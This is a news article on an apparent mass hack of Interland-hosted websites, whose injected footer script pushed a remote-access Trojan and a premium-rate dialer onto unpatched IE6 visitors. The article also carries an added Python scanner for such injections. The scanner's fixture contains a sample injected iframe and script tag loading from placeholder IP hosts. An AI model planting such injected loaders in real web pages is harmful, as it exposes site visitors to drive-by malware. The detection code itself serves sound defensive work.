Security Holes Vex Web Host Firm



Interland, the world's second-largest Web-hosting company, appears to have suffered an ongoing mass hack attack that has compromised some 1,100 websites, according to a security professional who has analyzed the script.

Marc Maiffret, a co-founder of eEye Digital Security, said the sites have been infected with a malicious script that continues to reinfect them after they are cleaned. The hack has also placed visitors to the compromised sites at risk of being infected by malicious code, he said.

But Interland denies that a hack has occurred, saying only that a few sites have gone offline.

According to Maiffret, Web surfers who have visited the compromised sites might get a surprise on their next phone bill when they discover expensive calls made to 900 numbers. Others could find their machines used, without their knowledge, in a denial-of-service attack against another computer.

That's because the malicious script placed in the HTML code at the bottom of many Interland-hosted Web pages instructs visitors' browsers to contact other malicious sites and download one of two Trojan horses, each with a different effect on the user's machine. The script only works against visitors running an unpatched version of the Internet Explorer 6 browser; patched browsers are not affected.

Max Riseman, owner of WeatherMaine, a site providing weather news in Maine that is hosted by Interland, said he first found the malicious script on his website last Thursday.

After complaining to Interland, the company removed the code from Riseman's site on Thursday, but it reappeared on Friday, he said. Interland removed it again on Saturday, only to have it appear again on Tuesday and Wednesday.

In a note to Riseman, an Interland tech-support rep wrote that someone had used a "previously unknown exploit" to gain access to one of Interland's servers and that the company was "working in conjunction with Microsoft to correct the issue permanently."

A second tech-support person told Riseman in an e-mail that engineers were patching the server. That implies the attacker placed code on the Interland server itself, which then automatically re-inserts the malicious script into the HTML pages hosted there, which would explain why the script came back each time it was removed from an individual site.

"Due to the severity of this issue, we are directing all available external and internal resources to minimize the impact to our customers and to prevent future reoccurrences," a tech rep wrote.

Interland has offered conflicting responses when asked about the problem. In a pop-up message that appears on the company's tech-support page after customers log in, Interland writes that "engineers and security experts are working with external experts" to address "the root causes of these issues." The note also says that the problems have been caused by "malicious activity" and that Interland "is in contact with the appropriate law enforcement agencies regarding this situation."

But in an interview, other than admitting that certain of its customers' websites have experienced "service and availability" issues, the company denied that any server has been hacked or that its server software has any vulnerability that could be exploited in such a way. Initially, Interland also denied that a malicious script was found on customers' websites.

Interland's Jeff Reich, director of information security and controls, said there was a short period when the websites for some customers were unavailable, but "it wasn't a matter of the server going down or any data compromise or anything like that," he said. "Beyond that, I don't think there's actually ... anything that I would call a hack attack."

Interland hosts more than 250,000 websites. Its customers include small and medium-size businesses, among them e-commerce sites. The company is considered the largest Windows 2000-based hosting firm. One of the company's key partners and investors is Microsoft. The company runs Microsoft server software alongside that of other vendors.

But despite the note from a tech rep stating that the problem was a hacked server, Reich said, "There is no inherent vulnerability or vendor issue associated with what we're experiencing right now."

According to Maiffret, the script is embedded in HTML code in the footer of Web pages (the footer is the area at the bottom of a Web page where a business generally includes copyright info and its privacy policy). The script exploits a vulnerability in Internet Explorer 6 that was reported in December 2001. Only users who have not patched IE6 are vulnerable.

As the infected Web page loads in a browser, the script causes the user's computer to contact one of four IP addresses hosting pages that push the Trojan horses onto the user's computer, a so-called drive-by download. This all occurs without the user being aware that anything is happening.

AICORE is one of the Trojan horses. This program gives a hacker remote access to the infected computer and also turns it into a zombie for use in a future denial-of-service attack. The other Trojan horse, ap26.exe, contains an automatic dialer that causes the user's modem to dial premium-rate numbers (such as 900 numbers owned by pornographers), resulting in charges on the user's phone bill.

Maiffret says he found 1,100 of Interland's sites to be infected with the script by using Google to search for a text string contained in the script. Maiffret spoke with an Interland employee on the phone who told him the company knew about the mass hack and that the FBI had been contacted. He also said Interland told him it was working with the FBI to take down the websites that were hosting the Trojan horse code.
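The detection side of what Maiffret describes, as an added example (not code from the article, from eEye or from Interland): scan hosted HTML files for the two indicators the article gives, a known text string from the injected script and footer script or frame tags whose source is a raw IP address, and fingerprint a cleaned page so a later re-check can tell whether the script has been re-inserted. The signature string, the 192.0.2.x addresses and the sample pages below are constructed placeholders; the article does not give the real ones.

```python
"""Scan hosted HTML pages for an injected footer script.

Added example, not code from the article or from Interland/eEye. The
signature string, IP addresses and sample pages are constructed for
illustration; the real ones are not given in the article.
"""
import hashlib
import re
from pathlib import Path

# Constructed stand-in for the text string Maiffret searched for on Google.
SIGNATURE = 'document.write("<iframe src=http://192.0.2.10/ad.html'

# A script/iframe/frame/object/embed tag whose src (or data) attribute
# points at a raw IPv4 address, with or without an http(s):// prefix.
IP_SRC_RE = re.compile(
    r'<(?:script|iframe|frame|object|embed)\b[^>]*?\b(?:src|data)\s*=\s*["\']?'
    r'(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})',
    re.IGNORECASE,
)


def footer_region(html: str, tail_bytes: int = 2000) -> str:
    """Return the end of the page: the tail_bytes before the last </body>
    plus everything after it, which is where a footer injection sits."""
    idx = html.lower().rfind("</body>")
    end = idx if idx >= 0 else len(html)
    return html[max(0, end - tail_bytes):]


def scan_html(html: str, allowed_ips=frozenset()) -> list:
    """Return (kind, detail) findings for one page.

    kind is "signature" for an exact match on the known string, or
    "ip-src" for a footer tag loading content from a raw IP address that
    is not on the site's own allow-list."""
    findings = []
    if SIGNATURE in html:
        findings.append(("signature", SIGNATURE))
    for match in IP_SRC_RE.finditer(footer_region(html)):
        ip = match.group(1)
        if ip not in allowed_ips:
            findings.append(("ip-src", ip))
    return findings


def fingerprint(html: str) -> str:
    """SHA-256 of the page with whitespace normalised. Record this after a
    page is cleaned; a different value on the next check means the page
    changed again, which is how reinfection shows up."""
    normalised = " ".join(html.split())
    return hashlib.sha256(normalised.encode("utf-8")).hexdigest()


def scan_tree(root: Path, allowed_ips=frozenset()) -> dict:
    """Scan every .htm/.html file under root; map relative path -> findings."""
    results = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in (".htm", ".html"):
            html = path.read_text(encoding="utf-8", errors="replace")
            hits = scan_html(html, allowed_ips)
            if hits:
                results[str(path.relative_to(root))] = hits
    return results


# Constructed sample pages: a clean footer and the same page with an
# injected script block appended just before </body>.
CLEAN_PAGE = """<html><body><h1>Weather</h1>
<p>Forecast: fog.</p>
<div class="footer">Copyright 2002. <a href="/privacy.html">Privacy</a></div>
</body></html>"""

INFECTED_PAGE = CLEAN_PAGE.replace(
    "</body></html>",
    '<script>document.write("<iframe src=http://192.0.2.10/ad.html '
    'width=1 height=1>")</script>\n'
    '<script src="http://192.0.2.11/x.js"></script>\n</body></html>',
)

if __name__ == "__main__":
    print("clean:", scan_html(CLEAN_PAGE))
    print("infected:", scan_html(INFECTED_PAGE))
    print("page changed since baseline:",
          fingerprint(INFECTED_PAGE) != fingerprint(CLEAN_PAGE))
```

The signature match is the cheap, exact check; the raw-IP rule catches variants that change the string but keep the same delivery method. Pass the site's own addresses in allowed_ips to keep legitimate self-hosted scripts out of the findings, and run scan_tree on a schedule rather than once, since the article's whole point is that cleaned pages were re-infected within days.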

But Reich said, "We have not called the FBI for anything associated with this ... nor did we ask for the FBI to be involved in what's going on here."

Joe Parris, special agent with the FBI in Atlanta, said no one had contacted the agency's cybercrime division about a problem at Interland and he knew of no case related to it.

Microsoft did not respond to a request for comment.

Interland quietly dealt with a similar problem back in May when a hacker inserted the same malicious script on a site called LabMice.net, which directed users to an IP address for the site where a Trojan Horse was posted. Interland removed the script, but it reappeared on July 28. Interland apparently applied a fix, only to have the mass hack attack begin exactly a month later on Aug. 28.

Interland says it has fixed all problems with customers' sites going offline and says it is working to make sure the problem doesn't return.

In the meantime, in an online discussion forum (registration required) for webmasters, Interland customers continue to report problems with the malicious script appearing on their websites.